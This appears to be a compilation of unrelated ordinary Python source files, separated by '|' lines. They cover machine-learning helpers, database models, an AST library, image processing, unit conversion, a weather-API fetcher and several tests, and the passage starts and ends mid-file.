return tt[make_key(d, e, f)]
def f_g(c, g):
tt = dict(
tt=0.8, tf=0.2,
ft=0.1, ff=0.9)
return tt[make_key(c, g)]
def f_h(e, g, h):
tt = dict(
ttt=0.05, ttf=0.95,
tft=0.95, tff=0.05,
ftt=0.95, ftf=0.05,
fft=0.95, fff=0.05)
return tt[make_key(e, g, h)]
if __name__ == '__main__':
g = build_graph(
f_a, f_b, f_c, f_d,
f_e, f_f, f_g, f_h)
g.n_samples = 1000
g.q()
|
def plotLearningCurve(Xtrn, Ytrn, model, param_name, param_range):
'''
Plot the bias/variance tradeoff for a given model. This curve is
the training and test error (via split) of the model as a function
of model complexity.
Wrapper for validation_curve in sklearn.
---
I:
O: Plot of the bias/var tradeoff.
'''
from sklearn.learning_curve import validation_curve
validation_curve(model, Xtrn, Ytrn, param_name, param_range, cv=5,
n_jobs=-1, pre_dispatch='all', verbose=1)
return
|
from __future__ import unicode_literals
from sqlalchemy.ext.declarative import declared_attr
from indico.core.db import db
from indico.core.db.sqlalchemy import UTCDateTime
from indico.core.db.sqlalchemy.descriptions import RenderMode, RenderModeMixin
from indico.util.date_time import now_utc
class ReviewCommentMixin(RenderModeMixin):
possible_render_modes = {RenderMode.markdown}
default_render_mode = RenderMode.markdown
user_backref_name = None
user_modified_backref_name = None
TIMELINE_TYPE = 'comment'
@declared_attr
def id(cls):
return db.Column(
db.Integer,
primary_key=True
)
@declared_attr
def user_id(cls):
return db.Column(
db.Integer,
db.ForeignKey('users.users.id'),
index=True,
nullable=False
)
@declared_attr
def _text(cls):
return db.Column(
'text',
db.Text,
nullable=False
)
@declared_attr
def modified_by_id(cls):
return db.Column(
db.Integer,
db.ForeignKey('users.users.id'),
index=True,
nullable=True
)
@declared_attr
def created_dt(cls):
return db.Column(
UTCDateTime,
nullable=False,
default=now_utc
)
@declared_attr
def modified_dt(cls):
return db.Column(
UTCDateTime,
nullable=True
)
@declared_attr
def is_deleted(cls):
return db.Column(
db.Boolean,
nullable=False,
default=False
)
@declared_attr
def user(cls):
return db.relationship(
'User',
lazy=True,
foreign_keys=cls.user_id,
backref=db.backref(
cls.user_backref_name,
primaryjoin='({0}.user_id == User.id) & ~{0}.is_deleted'.format(cls.__name__),
lazy='dynamic'
)
)
@declared_attr
def modified_by(cls):
return db.relationship(
'User',
lazy=True,
foreign_keys=cls.modified_by_id,
backref=db.backref(
cls.user_modified_backref_name,
primaryjoin='({0}.modified_by_id == User.id) & ~{0}.is_deleted'.format(cls.__name__),
lazy='dynamic'
)
)
text = RenderModeMixin.create_hybrid_property('_text')
|
"""blah."""
from pyiem.util import get_dbconn
pgconn = get_dbconn("idep")
cursor = pgconn.cursor()
cursor.execute(
"""
SELECT r.hs_id, r.huc_12, p.fpath, extract(year from valid) as yr,
sum(runoff) as sum_runoff,
sum(loss) as sum_loss, sum(delivery) as sum_delivery from
results r JOIN flowpaths p on (r.hs_id = p.fid)
WHERE r.scenario = 5
GROUP by r.hs_id, r.huc_12, fpath, yr
"""
)
print("CATCHMENT,HUC12,FPATH,YEAR,RUNOFF,LOSS,DELIVERY")
for row in cursor:
fpath = row[0]
if fpath < 100:
catchment = 0
else:
catchment = int(str(fpath)[:-2])
print(str(catchment) + ",%s,%s,%s,%.4f,%.4f,%.4f" % row[1:])
|
import functools
import sys
import traceback
from stacked import Stacked
from .xtraceback import XTraceback
class TracebackCompat(Stacked):
"""
A context manager that patches the stdlib traceback module
Functions in the traceback module that exist as a method of this class are
replaced with equivalents that use XTraceback.
:cvar NOPRINT: Exception types that we don't print for (includes None)
:type NOPRINT: tuple
:ivar defaults: Default options to apply to XTracebacks created by this
instance
:type defaults: dict
"""
NOPRINT = (None, KeyboardInterrupt)
def __init__(self, **defaults):
super(TracebackCompat, self).__init__()
self.defaults = defaults
# register patches for methods that wrap traceback functions
for key in dir(traceback):
if hasattr(self, key):
self._register_patch(traceback, key, getattr(self, key))
#def __exit__(self, etype, evalue, tb):
#if etype not in self.NOPRINT:
#self.print_exception(etype, evalue, tb)
#super(TracebackCompat, self).__exit__(etype, evalue, tb)
def _factory(self, etype, value, tb, limit=None, **options):
options["limit"] = \
getattr(sys, "tracebacklimit", None) if limit is None else limit
_options = self.defaults.copy()
_options.update(options)
return XTraceback(etype, value, tb, **_options)
def _print_factory(self, etype, value, tb, limit=None, file=None,
**options):
# late binding here may cause problems where there is no sys i.e. on
# google app engine but it is required for cases where sys.stderr is
# rebound i.e. under nose
if file is None and hasattr(sys, "stderr"):
file = sys.stderr
options["stream"] = file
return self._factory(etype, value, tb, limit, **options)
@functools.wraps(traceback.format_tb)
def format_tb(self, tb, limit=None, **options):
xtb = self._factory(None, None, tb, limit, **options)
return xtb.format_tb()
@functools.wraps(traceback.format_exception_only)
def format_exception_only(self, etype, value, **options):
xtb = self._factory(etype, value, None, **options)
return xtb.format_exception_only()
@functools.wraps(traceback.format_exception)
def format_exception(self, etype, value, tb, limit=None, **options):
xtb = self._factory(etype, value, tb, limit, **options)
return xtb.format_exception()
@functools.wraps(traceback.format_exc)
def format_exc(self, limit=None, **options):
options["limit"] = limit
return "".join(self.format_exception(*sys.exc_info(), **options))
@functools.wraps(traceback.print_tb)
def print_tb(self, tb, limit=None, file=None, **options):
xtb = self._print_factory(None, None, tb, limit, file, **options)
xtb.print_tb()
@functools.wraps(traceback.print_exception)
def print_exception(self, etype, value, tb, limit=None, file=None,
**options):
xtb = self._print_factory(etype, value, tb, limit, file, **options)
xtb.print_exception()
@functools.wraps(traceback.print_exc)
def print_exc(self, limit=None, file=None, **options):
options["limit"] = limit
options["file"] = file
self.print_exception(*sys.exc_info(), **options)
|
import urllib2, json, time, sys
from datetime import date, datetime
from dateutil.rrule import rrule, DAILY
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-f", dest="fahrenheit", action="store", default=False, type="string", help="Convert to FAHRENHEIT")
parser.add_option("-e", dest="end", action="store", default=False, type="string", help="START date")
parser.add_option("-s", dest="start", action="store", default=False, type="string", help="END date")
parser.add_option("-t", dest="token", action="store", default=False, type="string", help="Weather Underground TOKEN")
(options, args) = parser.parse_args()
if options.token:
token = options.token
else:
parser.print_help()
sys.exit()
if options.start:
start = options.start
else:
parser.print_help()
sys.exit()
if options.end:
end = options.end
else:
parser.print_help()
sys.exit()
if options.fahrenheit:
fahrenheit = True
else:
fahrenheit = False
start = datetime.strptime(start,'%Y-%m-%d')
end = datetime.strptime(end,'%Y-%m-%d')
url = ""
if end < start:
print "Error: end date " + str(end) + " occurs before start date " + str(start)
sys.exit()
for dt in rrule(DAILY, dtstart=start, until=end):
total = 0.0
temp = 0.0
count = 0
wunderground_url ="http://api.wunderground.com/api/" + token + "/history_" + dt.strftime("%Y%m%d") +"/q/NY/New_York_City.json"
try:
url = urllib2.urlopen(wunderground_url)
parsed_json = json.loads(url.read())
except:
print "Error reading URL " + wunderground_url
print "Is your token correct?"
url.close()
sys.exit()
try:
for mean in parsed_json['history']['observations']:
if fahrenheit:
total += float(mean['tempi'])
else:
total += float(mean['tempm'])
count += 1
temp = (total / count)
print dt.strftime("%Y-%m-%d") + "," + str(temp)
except:
print "Error retrieving temperature records for start date " + str(start) + " end date " + str(end)
url.close()
time.sleep(10)
|
import unittest
import slack.http_client
from slack.exception import SlackError, \
InvalidAuthError, \
NotAuthedError, \
AccountInactiveError, \
ChannelNotFoundError, \
ChannelArchivedError, \
NotInChannelError, \
RateLimitedError
class TestRaiseErrorClient(unittest.TestCase):
def test_ok_response(self):
# does not raise error if response is ok
slack.http_client._raise_error_if_not_ok({ 'ok': True })
def test_invalid_auth(self):
self.assertRaises(InvalidAuthError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'invalid_auth' })
def test_not_authed(self):
self.assertRaises(NotAuthedError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'not_authed' })
def test_account_inactive(self):
self.assertRaises(AccountInactiveError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'account_inactive' })
def test_channel_not_found(self):
self.assertRaises(ChannelNotFoundError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'channel_not_found' })
def test_is_archived(self):
self.assertRaises(ChannelArchivedError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'is_archived' })
def test_not_in_channel(self):
self.assertRaises(NotInChannelError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'not_in_channel' })
def test_rate_limited(self):
self.assertRaises(RateLimitedError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'rate_limited' })
def test_slack_error(self):
self.assertRaises(SlackError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'unknown_error' })
|
import ShareYourSystem as SYS
MyParenter=SYS.ParenterClass(
).array(
[
['-Layers'],
['|First','|Second'],
['-Neurons'],
['|E','|I']
]
).command(
'+-.values+|.values',
'#call:parent',
_AfterWalkRigidBool=True
).command(
'+-.values+|.values',
{
'#bound:recruit':lambda _InstanceVariable:_InstanceVariable[
'/Top/NeuronsDict'
].__setitem__(
_InstanceVariable.ManagementTagStr,
_InstanceVariable
)
if _InstanceVariable['/^/ParentKeyStr']=="Neurons"
else None,
'/Top/LayersDict.__setitem__':{
'#value:#map@get':["/~/ManagementTagStr",">>self"],
'#if':[
('/~/^/ParentKeyStr',SYS.operator.eq,"#direct:Layers")
]
}
},
_AfterWalkRigidBool=True
)
print('MyParenter.NeuronsDict.keys() is ')
SYS._print(MyParenter.NeuronsDict.keys())
print('MyParenter.LayersDict.keys() is ')
SYS._print(MyParenter.LayersDict.keys())
|
import numpy
import chainer
from chainer import backend
from chainer import configuration
import chainer.functions as F
from chainer import link_hook
import chainer.links as L
from chainer import variable
import chainerx
from chainerx import _fallback_workarounds as fallback
def l2normalize(xp, v, eps):
"""Normalize a vector by its L2 norm.
Args:
xp (numpy or cupy):
v (numpy.ndarray or cupy.ndarray)
eps (float): Epsilon value for numerical stability.
Returns:
:class:`numpy.ndarray` or :class:`cupy.ndarray`
"""
# TODO(crcrpar): Remove this when chainerx.linalg.norm becomes available.
if xp is chainerx:
# NOTE(crcrpar): `chainerx.power` is not available as of 2019/03/27.
# See https://github.com/chainer/chainer/pull/6522
norm = chainerx.sqrt(chainerx.sum(v * v))
else:
norm = xp.linalg.norm(v)
return v / (norm + eps)
def update_approximate_vectors(
weight_matrix, u, n_power_iteration, eps):
"""Update the first left and right singular vectors.
This function updates the first left singular vector `u` and
the first right singular vector `v`.
Args:
weight_matrix (~chainer.Variable): 2D weight.
u (numpy.ndarray, cupy.ndarray, or None):
Vector that approximates the first left singular vector and
has the shape of (out_size,).
n_power_iteration (int): Number of iterations to approximate
the first right and left singular vectors.
Returns:
:class:`numpy.ndarray` or `cupy.ndarray`:
Approximate first left singular vector.
:class:`numpy.ndarray` or `cupy.ndarray`:
Approximate first right singular vector.
"""
weight_matrix = weight_matrix.array
xp = backend.get_array_module(weight_matrix)
for _ in range(n_power_iteration):
v = l2normalize(xp, xp.dot(u, weight_matrix), eps)
u = l2normalize(xp, xp.dot(weight_matrix, v), eps)
return u, v
def calculate_max_singular_value(weight_matrix, u, v):
"""Calculate max singular value by power iteration method.
Args:
weight_matrix (~chainer.Variable)
u (numpy.ndarray or cupy.ndarray)
v (numpy.ndarray or cupy.ndarray)
Returns:
~chainer.Variable: Max singular value via power iteration method.
"""
sigma = F.matmul(F.matmul(u, weight_matrix), v)
return sigma
class SpectralNormalization(link_hook.LinkHook):
"""Spectral Normalization link hook implementation.
This hook normalizes a weight using max singular value and this value
is computed via power iteration method. Currently, this hook is supposed to
be added to :class:`chainer.links.Linear`, :class:`chainer.links.EmbedID`,
:class:`chainer.links.Convolution2D`, :class:`chainer.links.ConvolutionND`,
:class:`chainer.links.Deconvolution2D`,
and :class:`chainer.links.DeconvolutionND`. However, you can use this to
other links like RNNs by specifying ``weight_name``.
It is highly recommended to add this hook before optimizer setup because
this hook add a scaling parameter ``gamma`` if ``use_gamma`` is True.
Otherwise, the registered ``gamma`` will not be updated.
.. math::
\\bar{\\mathbf{W}} &=& \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\
\\text{, where} \\ \\sigma(\\mathbf{W}) &:=&
\\max_{\\mathbf{h}: \\mathbf{h} \\ne 0}
\\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2}
= \\max_{\\|\\mathbf{h}\\|_2 \\le 1} \\|\\mathbf{W}\\mathbf{h}\\|_2
See: T. Miyato et. al., `Spectral Normalization for Generative Adversarial
Networks <https://arxiv.org/abs/1802.05957>`_
Args:
n_power_iteration (int): Number of power iteration.
The default value is 1.
eps (float): Numerical stability in norm calculation.
The default value is 1e-6 for the compatibility with
mixed precision training. The value used in the author's
implementation is 1e-12.
use_gamma (bool): If ``True``, weight scaling parameter gamma which is
initialized by initial weight's max singular value is introduced.
factor (float, None): Scaling parameter to divide maximum singular
value. The default value is 1.0.
weight_name (str): Link's weight name to apply this hook. The default
value is ``'W'``.
name (str or None): Name of this hook. The default value is
``'SpectralNormalization'``.
Attributes:
vector_name (str): Name of the approximate first left singular vector
registered in the target link.
the target link.
axis (int): Axis of weight represents the number of output
feature maps or output units (``out_channels`` and
``out_size``, respectively).
.. admonition:: Example
There are almost the same but 2 ways to apply spectral normalization
(SN) hook to links.
1. Initialize link and SN separately. This makes it easy to handle
buffer and parameter of links registered by SN hook.
>>> l = L.Convolution2D(3, 5, 3)
>>> hook = chainer.link_hooks.SpectralNormalization()
>>> _ = l.add_hook(hook)
>>> # Check the shape of the first left singular vector.
>>> getattr(l, hook.vector_name).shape
(5,)
>>> # Delete SN hook from this link.
>>> l.delete_hook(hook.name)
2. Initialize both link and SN hook at one time. This makes it easy to
define your original :class:`~chainer.Chain`.
>>> # SN hook handles lazy initialization!
>>> layer = L.Convolution2D(
... 5, 3, stride=1, pad=1).add_hook(
... chainer.link_hooks.SpectralNormalization())
"""
name = 'SpectralNormalization'
def __init__(self, n_power_iteration=1, eps=1e-6, use_gamma=False,
factor=None, weight_name='W', name=None):
assert n_power_iteration > 0
self.n_power_iteration = n_power_iteration
self.eps = eps
self.use_gamma = use_gamma
self.factor = factor
self.weight_name = weight_name
self.vector_name = weight_name + '_u'
self._initialized = False
self.axis = 0
if name is not None:
self.name = name
def __enter__(self):
raise NotImplementedError(
'This hook is not supposed to be used as context manager.')
def __exit__(self):
raise NotImplementedError
def added(self, link):
# Define axis and register ``u`` if the weight is initialized.
if not hasattr(link, self.weight_name):
raise ValueError(
'Weight \'{}\' does not exist!'.format(self.weight_name))
if isinstance(link, (L.Deconvolution2D, L.DeconvolutionND)):
self.axis = 1
if getattr(link, self.weight_name).array is not None:
self._prepare_parameters(link)
def deleted(self, link):
# Remove approximate vector ``u`` and parameter ``gamma` if exists.
delattr(link, self.vector_name)
if self.use_gamma:
del link.gamma
def forward_preprocess(self, cb_args):
# This method normalizes target link's weight spectrally
# using power iteration method
link = cb_args.link
input_variable = cb_args.args[0]
if not self._initialized:
self._prepare_parameters(link, input_variable)
weight = getattr(link, self.weight_name)
# For link.W or equivalents to be chainer.Parameter
# consistently to users, this hook maintains a reference to
# the unnormalized weight.
self.original_weight = weight
# note: `normalized_weight` is ~chainer.Variable
normalized_weight = self.normalize_weight(link)
setattr(link, self.weight_name, normalized_weight)
def forward_postprocess(self, cb_args):
# Here, the computational graph is already created,
# we can reset link.W or equivalents to be Parameter.
link = cb_args.link
setattr(link, self.weight_name, self.original_weight)
def _prepare_parameters(self, link, input_variable=None):
"""Prepare one buffer and one parameter.
Args:
link (:class:`~chainer.Link`): Link to normalize spectrally.
input_variable (:class:`~chainer.Variable`):
The first minibatch to initialize weight.
"""
if getattr(link, self.weight_name).array is None:
if input_variable is not None:
link._initialize_params(input_variable.shape[1])
initialW = getattr(link, self.weight_name)
if initialW.shape[self.axis] == 0:
raise ValueError(
'Expect {}.shape[{}] > 0'.format(self.weight_name, self.axis)
)
u = link.xp.random.normal(
size=(initialW.shape[self.axis],)).astype(dtype=initialW.dtype)
setattr(link, self.vector_name, u)
link.register_persistent(self.vector_name)
if self.use_gamma:
# Initialize the scaling parameter with the max singular value.
weight_matrix = self.reshape_W(initialW.array)
# TODO(crcrpar): Remove this when chainerx supports SVD.
if link.xp is chainerx:
xp, device, array = fallback._from_chx(weight_matrix)
if xp is numpy:
_, s, _ = numpy.linalg.svd(array)
else:
with chainer.using_device(device):
_, s, _ = xp.linalg.svd(array)
else:
_, s, _ = link.xp.linalg.svd(weight_matrix)
with link.init_scope():
link.gamma = variable.Parameter(s[0], ())
self._initialized = True
def normalize_weight(self, link):
"""Normalize target weight before every single forward computation."""
weight_name, vector_name = self.weight_name, self.vector_name
W = getattr(link, weight_name)
u = getattr(link, vector_name)
weight_matrix = self.reshape_W(W)
if not configuration.config.in_recomputing:
with chainer.using_device(link.device):
u, v = update_approximate_vectors(
weight_matrix, u, self.n_power_iteration, self.eps)
else:
v = self.v
sigma = calculate_max_singular_value(weight_matrix, u, v)
if self.factor is not None:
sigma /= self.factor
if self.use_gamma:
W = link.gamma * W / sigma
else:
W = W / sigma
if not configuration.config.in_recomputing:
self.v = v
with chainer.using_device(link.device):
if configuration.config.train:
if link.xp is chainerx:
# TODO(crcrpar): Remove this when
# chainerx supports `copyto`.
getattr(link, vector_name)[:] = u
else:
backend.copyto(getattr(link, vector_name), u)
return W
def reshape_W(self, W):
"""Reshape & transpose weight into 2D if necessary."""
if self.axis != 0:
axes = [self.axis] + [i for i in range(W.ndim) if i != self.axis]
W = W.transpose(axes)
if W.ndim == 2:
return W
return W.reshape(W.shape[0], -1)
|
from SimpleTCPClient import SimpleTCPClient
from SimpleTCPClientException import HTTPError, URLError
__all__ = [SimpleTCPClient, HTTPError, URLError]
|
import sys as _sys
import ast as _ast
from ast import boolop, cmpop, excepthandler, expr, expr_context, operator
from ast import slice, stmt, unaryop, mod, AST
def _make_node(Name, Fields, Attributes, Bases):
def create_node(self, *args, **kwargs):
nbparam = len(args) + len(kwargs)
assert nbparam in (0, len(Fields)), \
"Bad argument number for {}: {}, expecting {}".\
format(Name, nbparam, len(Fields))
self._fields = Fields
self._attributes = Attributes
for argname, argval in zip(self._fields, args):
setattr(self, argname, argval)
for argname, argval in kwargs.items():
assert argname in Fields, \
"Invalid Keyword argument for {}: {}".format(Name, argname)
setattr(self, argname, argval)
setattr(_sys.modules[__name__],
Name,
type(Name,
Bases,
{'__init__': create_node}))
_nodes = {
# mod
'Module': (('body',), (), (mod,)),
'Interactive': (('body',), (), (mod,)),
'Expression': (('body',), (), (mod,)),
'Suite': (('body',), (), (mod,)),
# stmt
'FunctionDef': (('name', 'args', 'body', 'decorator_list', 'returns',),
('lineno', 'col_offset',),
(stmt,)),
'AsyncFunctionDef': (('name', 'args', 'body',
'decorator_list', 'returns',),
('lineno', 'col_offset',),
(stmt,)),
'ClassDef': (('name', 'bases', 'keywords', 'body', 'decorator_list',),
('lineno', 'col_offset',),
(stmt,)),
'Return': (('value',), ('lineno', 'col_offset',),
(stmt,)),
'Delete': (('targets',), ('lineno', 'col_offset',),
(stmt,)),
'Assign': (('targets', 'value',), ('lineno', 'col_offset',),
(stmt,)),
'AugAssign': (('target', 'op', 'value',), ('lineno', 'col_offset',),
(stmt,)),
'Print': (('dest', 'values', 'nl',), ('lineno', 'col_offset',),
(stmt,)),
'For': (('target', 'iter', 'body', 'orelse',), ('lineno', 'col_offset',),
(stmt,)),
'AsyncFor': (('target', 'iter', 'body', 'orelse',),
('lineno', 'col_offset',),
(stmt,)),
'While': (('test', 'body', 'orelse',), ('lineno', 'col_offset',),
(stmt,)),
'If': (('test', 'body', 'orelse',), ('lineno', 'col_offset',),
(stmt,)),
'With': (('items', 'body',), ('lineno', 'col_offset',),
(stmt,)),
'AsyncWith': (('items', 'body',), ('lineno', 'col_offset',),
(stmt,)),
'Raise': (('exc', 'cause',), ('lineno', 'col_offset',),
(stmt,)),
'Try': (('body', 'handlers', 'orelse', 'finalbody',),
('lineno', 'col_offset',),
(stmt,)),
'Assert': (('test', 'msg',), ('lineno', 'col_offset',),
(stmt,)),
'Import': (('names',), ('lineno', 'col_offset',),
(stmt,)),
'ImportFrom': (('module', 'names', 'level',), ('lineno', 'col_offset',),
(stmt,)),
'Exec': (('body', 'globals', 'locals',), ('lineno', 'col_offset',),
(stmt,)),
'Global': (('names',), ('lineno', 'col_offset',),
(stmt,)),
'Nonlocal': (('names',), ('lineno', 'col_offset',),
(stmt,)),
'Expr': (('value',), ('lineno', 'col_offset',),
(stmt,)),
'Pass': ((), ('lineno', 'col_offset',),
(stmt,)),
'Break': ((), ('lineno', 'col_offset',),
(stmt,)),
'Continue': ((), ('lineno', 'col_offset',),
(stmt,)),
# expr
'BoolOp': (('op', 'values',), ('lineno', 'col_offset',),
(expr,)),
'BinOp': (('left', 'op', 'right',), ('lineno', 'col_offset',),
(expr,)),
'UnaryOp': (('op', 'operand',), ('lineno', 'col_offset',),
(expr,)),
'Lambda': (('args', 'body',), ('lineno', 'col_offset',),
(expr,)),
'IfExp': (('test', 'body', 'orelse',), ('lineno', 'col_offset',),
(expr,)),
'Dict': (('keys', 'values',), ('lineno', 'col_offset',),
(expr,)),
'Set': (('elts',), ('lineno', 'col_offset',),
(expr,)),
'ListComp': (('elt', 'generators',), ('lineno', 'col_offset',),
(expr,)),
'SetComp': (('elt', 'generators',), ('lineno', 'col_offset',),
(expr,)),
'DictComp': (('key', 'value', 'generators',), ('lineno', 'col_offset',),
(expr,)),
'GeneratorExp': (('elt', 'generators',), ('lineno', 'col_offset',),
(expr,)),
'Await': (('value',), ('lineno', 'col_offset',),
(expr,)),
'Yield': (('value',), ('lineno', 'col_offset',),
(expr,)),
'YieldFrom': (('value',), ('lineno', 'col_offset',),
(expr,)),
'Compare': (('left', 'ops', 'comparators',), ('lineno', 'col_offset',),
(expr,)),
'Call': (('func', 'args', 'keywords',), ('lineno', 'col_offset',),
(expr,)),
'Repr': (('value',), ('lineno', 'col_offset',),
(expr,)),
'Num': (('n',), ('lineno', 'col_offset',),
(expr,)),
'Str': (('s',), ('lineno', 'col_offset',),
(expr,)),
'FormattedValue': (('value', 'conversion', 'format_spec',),
('lineno', 'col_offset',), (expr,)),
'JoinedStr': (('values',), ('lineno', 'col_offset',), (expr,)),
'Bytes': (('s',), ('lineno', 'col_offset',),
(expr,)),
'NameConstant': (('value',), ('lineno', 'col_offset',),
(expr,)),
'Ellipsis': ((), ('lineno', 'col_offset',),
(expr,)),
'Attribute': (('value', 'attr', 'ctx',), ('lineno', 'col_offset',),
(expr,)),
'Subscript': (('value', 'slice', 'ctx',), ('lineno', 'col_offset',),
(expr,)),
'Starred': (('value', 'ctx',), ('lineno', 'col_offset',),
(expr,)),
'Name': (('id', 'ctx', 'annotation'), ('lineno', 'col_offset',),
(expr,)),
'List': (('elts', 'ctx',), ('lineno', 'col_offset',),
(expr,)),
'Tuple': (('elts', 'ctx',), ('lineno', 'col_offset',),
(expr,)),
# expr_context
'Load': ((), (), (expr_context,)),
'Store': ((), (), (expr_context,)),
'Del': ((), (), (expr_context,)),
'AugLoad': ((), (), (expr_context,)),
'AugStore': ((), (), (expr_context,)),
'Param': ((), (), (expr_context,)),
# slice
'Slice': (('lower', 'upper', 'step'), (), (slice,)),
'ExtSlice': (('dims',), (), (slice,)),
'Index': (('value',), (), (slice,)),
# boolop
'And': ((), (), (boolop,)),
'Or': ((), (), (boolop,)),
# operator
'Add': ((), (), (operator,)),
'Sub': ((), (), (operator,)),
'Mult': ((), (), (operator,)),
'MatMult': ((), (), (operator,)),
'Div': ((), (), (operator,)),
'Mod': ((), (), (operator,)),
'Pow': ((), (), (operator,)),
'LShift': ((), (), (operator,)),
'RShift': ((), (), (operator,)),
'BitOr': ((), (), (operator,)),
'BitXor': ((), (), (operator,)),
'BitAnd': ((), (), (operator,)),
'FloorDiv': ((), (), (operator,)),
# unaryop
'Invert': ((), (), (unaryop, AST,)),
'Not': ((), (), (unaryop, AST,)),
'UAdd': ((), (), (unaryop, AST,)),
'USub': ((), (), (unaryop, AST,)),
# cmpop
'Eq': ((), (), (cmpop,)),
'NotEq': ((), (), (cmpop,)),
'Lt': ((), (), (cmpop,)),
'LtE': ((), (), (cmpop,)),
'Gt': ((), (), (cmpop,)),
'GtE': ((), (), (cmpop,)),
'Is': ((), (), (cmpop,)),
'IsNot': ((), (), (cmpop,)),
'In': ((), (), (cmpop,)),
'NotIn': ((), (), (cmpop,)),
# comprehension
'comprehension': (('target', 'iter', 'ifs', 'is_async'), (), (AST,)),
# excepthandler
'ExceptHandler': (('type', 'name', 'body'), ('lineno', 'col_offset'),
(excepthandler,)),
# arguments
'arguments': (('args', 'vararg', 'kwonlyargs', 'kw_defaults',
'kwarg', 'defaults'), (), (AST,)),
# keyword
'keyword': (('arg', 'value'), (), (AST,)),
# alias
'alias': (('name', 'asname'), (), (AST,)),
# withitem
'withitem': (('context_expr', 'optional_vars'), (), (AST,)),
}
for name, descr in _nodes.items():
_make_node(name, *descr)
if _sys.version_info.major == 2:
from .ast2 import ast_to_gast, gast_to_ast
if _sys.version_info.major == 3:
from .ast3 import ast_to_gast, gast_to_ast
def parse(*args, **kwargs):
return ast_to_gast(_ast.parse(*args, **kwargs))
def literal_eval(node_or_string):
if isinstance(node_or_string, AST):
node_or_string = gast_to_ast(node_or_string)
return _ast.literal_eval(node_or_string)
def get_docstring(node, clean=True):
if not isinstance(node, (FunctionDef, ClassDef, Module)):
raise TypeError("%r can't have docstrings" % node.__class__.__name__)
if node.body and isinstance(node.body[0], Expr) and \
isinstance(node.body[0].value, Str):
if clean:
import inspect
return inspect.cleandoc(node.body[0].value.s)
return node.body[0].value.s
|
import cv2
from . import print_image
from . import plot_image
def invert(img, device, debug=None):
"""Inverts grayscale images.
Inputs:
img = image object, grayscale
device = device number. Used to count steps in the pipeline
debug = None, print, or plot. Print = save to file, Plot = print to screen.
Returns:
device = device number
img_inv = inverted image
:param img: numpy array
:param device: int
:param debug: str
:return device: int
:return img_inv: numpy array
"""
device += 1
img_inv = cv2.bitwise_not(img)
if debug == 'print':
print_image(img_inv, (str(device) + '_invert.png'))
elif debug == 'plot':
plot_image(img_inv, cmap='gray')
return device, img_inv
|
def token_encryption_algorithm():
return 'HS256'
|
import re
import quantities as pq
from numbers import NumberService
class ConversionService(object):
__exponents__ = {
'square': 2,
'squared': 2,
'cubed': 3
}
def _preprocess(self, input):
def handleExponents(input):
m = re.search(r'\bsquare (\w+)', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\bsquare (\w+)', r'\g<1>^2', input)
m = re.search(r'\bsquared (\w+)', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\bsquared (\w+)', r'\g<1>^2', input)
m = re.search(r'\b(\w+) squared', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\b(\w+) squared', r'\g<1>^2', input)
m = re.search(r'\bsq (\w+)', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\bsq (\w+)', r'\g<1>^2', input)
m = re.search(r'\b(\w+) cubed', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\b(\w+) cubed', r'\g<1>^3', input)
m = re.search(r'\bcubic (\w+)', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\bcubic (\w+)', r'\g<1>^3', input)
service = NumberService()
m = re.search(r'\b(\w+) to the (\w+)( power)?', input)
if m and self.isValidUnit(m.group(1)):
if m.group(2) in service.__ordinals__:
exp = service.parseMagnitude(m.group(2))
input = re.sub(r'\b(\w+) to the (\w+)( power)?',
r'\g<1>^' + str(exp), input)
return input
input = re.sub(r'\sper\s', r' / ', input)
input = handleExponents(input)
return input
def parseUnits(self, input):
"""Carries out a conversion (represented as a string) and returns the
result as a human-readable string.
Args:
input (str): Text representing a unit conversion, which should
include a magnitude, a description of the initial units,
and a description of the target units to which the quantity
should be converted.
Returns:
A quantities object representing the converted quantity and its new
units.
"""
quantity = self.convert(input)
units = ' '.join(str(quantity.units).split(' ')[1:])
return NumberService.parseMagnitude(quantity.item()) + " " + units
def isValidUnit(self, w):
"""Checks if a string represents a valid quantities unit.
Args:
w (str): A string to be tested against the set of valid
quantities units.
Returns:
True if the string can be used as a unit in the quantities
module.
"""
bad = set(['point', 'a'])
if w in bad:
return False
try:
pq.Quantity(0.0, w)
return True
except:
return w == '/'
def extractUnits(self, input):
"""Collects all the valid units from an input string. Works by
appending consecutive words from the string and cross-referncing
them with a set of valid units.
Args:
input (str): Some text which hopefully contains descriptions
of different units.
Returns:
A list of strings, each entry in which is a valid quantities
unit.
"""
input = self._preprocess(input)
units = []
description = ""
for w in input.split(' '):
if self.isValidUnit(w) or w == '/':
if description:
description += " "
description += w
else:
if description:
units.append(description)
description = ""
if description:
units.append(description)
return units
def convert(self, input):
"""Converts a string representation of some quantity of units into a
quantities object.
Args:
input (str): A textual representation of some quantity of units,
e.g., "fifty kilograms".
Returns:
A quantities object representing the described quantity and its
units.
"""
input = self._preprocess(input)
n = NumberService().longestNumber(input)
units = self.extractUnits(input)
# Convert to quantity object, attempt conversion
quantity = pq.Quantity(float(n), units[0])
quantity.units = units[1]
return quantity
|
from functionaltest import FunctionalTest
class Test_2595_Throbber(FunctionalTest):
def test_spinner_appears_during_recalcs(self):
# * Harold likes to know when dirigible is working hard on his calculations
# * He logs in and creates a new sheet
self.login_and_create_new_sheet()
# * When the grid has appeared, the spinner might be visible, but it disappears
# rapidly as the initial empty recalc completes.
self.wait_for_spinner_to_stop()
# * and enters some hard-working user-code
self.append_usercode('import time\ntime.sleep(20)\nworksheet[1,1].value="ready"')
# * He spots the spinner on the page
self.wait_for(self.is_spinner_visible,
lambda : 'spinner not present',
